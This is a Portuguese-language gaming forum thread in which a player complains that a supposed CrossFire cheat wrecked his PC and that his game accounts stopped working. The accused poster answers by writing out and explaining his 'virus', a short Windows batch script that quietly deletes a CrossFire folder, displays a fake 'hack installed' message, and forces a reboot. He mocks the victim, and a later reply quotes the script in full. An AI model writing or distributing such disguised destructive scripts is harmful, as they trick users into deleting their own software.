Ir para conteúdo
Faça parte da equipe! (2024) ×

Votação para banir menbro FUDEU MEU PC


Posts Recomendados

Nike:hackershowdebola

Motivo ele falou que ia reiniciar o pc para o funcionamento do hack masi fudeu gastei RAIS 270,OO

 

Outros motivos quando o pc volto a funciona fui entra na minha conta no z8Game e disse senha incorreta... Fui entra no msn E DISSE SENHA INCORRETA....Fui entra no Point Blank senha incorreta..Fui entra no Combat arms senha incorreta......

 

Se algume acha que eu estou mentindo fale!!!!!

 

EU SEI QUE TO POSTANDO NO LUGAR ERRADO E SO PRA AVISA A GALERA pra nao FUDE O PC DELES:fuck::fuck:

 

Quem quer banir esse nub para sempre fala ai plsss TAVA NA BARRA NO Crossfire

 

Combat Arms :tambem tava na barra

 

Amanha vo ter que esplica para meus amigos o que aconteceu pq ACHO QUE ESSE NUBB FAI HOFENDER TODOS ELES NO MSN

Link para o comentário
Compartilhar em outros sites

O seu noob, eu não fiz nada idiota!, olha só como é o meu vírus:

cd..

cd..

cd..

cd..

cd arquivos de programas

cd Z8Games

cd CrossFire

ERASE cd HGWC /q /s

MSG * Pronto o hacker está instalado. Clique em 'OK' para ir para a próxima faze da instalação.

shutdown -r -c "Seu pc irá reiniciar para completar a instalação, quando ligar o pc novamente o hacker já estará instalado." -t 20

 

Esse é o código do vírus, suponho que você não intenda ele, então vou te explicar, a primeira parte:

cd..

cd..

cd..

cd..

cd arquivos de programas

cd Z8Games

cd CrossFire

ERASE cd HGWC /q /s

que é essa acima é para deletar uma pasta muito importante do Crossfire.

 

MSG * Pronto o hacker está instalado. Clique em 'OK' para ir para a próxima faze da instalação.

 

essa parte acima é para aparecer uma mensagem depois de deleta o crossfire.

 

shutdown -r -c "Seu pc irá reiniciar para completar a instalação, quando ligar o pc novamente o hacker já estará instalado." -t 20

 

essa parte é para reiniciar o pc.

 

 

Na próxima vez ve se não usa hacker idiota e nem vem querer dizer que eu estraguei seu pc, seu lixo vai aprender a jogar!.

hahahaha! bem feito. E para formata o pc custa 50 reais não 200 e pocos mintiroso, PESCADOR!

Link para o comentário
Compartilhar em outros sites

O seu noob, eu não fiz nada idiota!, olha só como é o meu vírus:

cd..

cd..

cd..

cd..

cd arquivos de programas

cd Z8Games

cd CrossFire

ERASE cd HGWC /q /s

MSG * Pronto o hacker está instalado. Clique em 'OK' para ir para a próxima faze da instalação.

shutdown -r -c "Seu pc irá reiniciar para completar a instalação, quando ligar o pc novamente o hacker já estará instalado." -t 20

 

Esse é o código do vírus, suponho que você não intenda ele, então vou te explicar, a primeira parte:

cd..

cd..

cd..

cd..

cd arquivos de programas

cd Z8Games

cd CrossFire

ERASE cd HGWC /q /s

que é essa acima é para deletar uma pasta muito importante do Crossfire.

 

MSG * Pronto o hacker está instalado. Clique em 'OK' para ir para a próxima faze da instalação.

 

essa parte acima é para aparecer uma mensagem depois de deleta o crossfire.

 

shutdown -r -c "Seu pc irá reiniciar para completar a instalação, quando ligar o pc novamente o hacker já estará instalado." -t 20

 

essa parte é para reiniciar o pc.

 

 

Na próxima vez ve se não usa hacker idiota e nem vem querer dizer que eu estraguei seu pc, seu lixo vai aprender a jogar!.

hahahaha! bem feito. E para formata o pc custa 50 reais não 200 e pocos mintiroso, PESCADOR!

 

Ae gente O meu Pc fica Reniciando soZinho oq eu fasso e um virus adivinha de qual sait eu pegui no WC ae GM ajuda ae

Link para o comentário
Compartilhar em outros sites

CARA TUDO Q VCS FOREM BAIXAR EM QUALQUER POST SE NAUM TIVER SCAN NAUM BAIXA E SER FOR ALGUMA COISA DE RENICIAR PC NAUM BAIXEM TBM PQ JA ACONTECEU COMIGO ISSU SO Q PERDI SO 25 REAIS DEPOIS DESSE DIA NUNCA MAS CONFiei EM NADA Q FOSSE SUSPEITO .. OBS: CONSELHO

Link para o comentário
Compartilhar em outros sites

Atenção!

 

Seu Tópico foi encontrado em Área Errada,

por este motivo estou fechando-lhe e aplicando um Aviso / Warn para que o mal-ocorrido não ocorra novamente.

Procure ler sempre as regras e as descrições das áreas.

 

Tópico Fechado [x]

3R2OKfG.png

 

Bonds are ties to each other. I don’t think little of that. But the futures we’re meant to walk won’t come to us with bonds alone. You’re responsible with living your own life. We’re simply stepping onto the next stage, is all.

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.